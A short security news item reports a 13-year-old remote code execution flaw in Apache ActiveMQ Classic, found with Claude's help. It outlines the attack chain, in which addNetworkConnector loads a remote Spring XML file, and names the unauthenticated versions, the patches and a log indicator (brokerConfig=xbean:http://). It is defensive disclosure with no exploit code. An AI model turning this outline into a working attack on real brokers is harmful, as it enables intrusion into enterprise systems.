AI-Assisted Research Surfaces 13-Year-Old RCE in Apache ActiveMQ Classic

A high-severity remote code execution flaw (CVE-2026-34197, CVSS 8.8) has been patched in Apache ActiveMQ Classic after sitting undetected for over a decade. Horizon3 researcher Naveen Sunkavally found it using Claude to trace how separately innocuous features - Jolokia’s management API, JMX, network connectors, and VM transports - chain together into an exploitable path. The attack works by abusing the addNetworkConnector function to pull a remote Spring XML file, triggering arbitrary command execution on initialization.

The flaw requires Jolokia authentication in most versions, but ActiveMQ 6.0.0 through 6.1.1 are fully unauthenticated targets due to a pre-existing access control bug (CVE-2024-32114). Apache patched CVE-2026-34197 in versions 5.19.4 and 6.2.3, eight days after receiving the report on March 22.

The urgency is real: ActiveMQ Classic remains deeply embedded in enterprise Java stacks, and two prior ActiveMQ CVEs - an authenticated web console RCE from 2016 and an unauthenticated broker RCE from 2023 - are already on CISA’s Known Exploited Vulnerabilities list. Exploitation leaves traces in broker logs via suspicious VM transport connections containing the brokerConfig=xbean:http:// parameter, but by the time the warning appears, the payload has already run.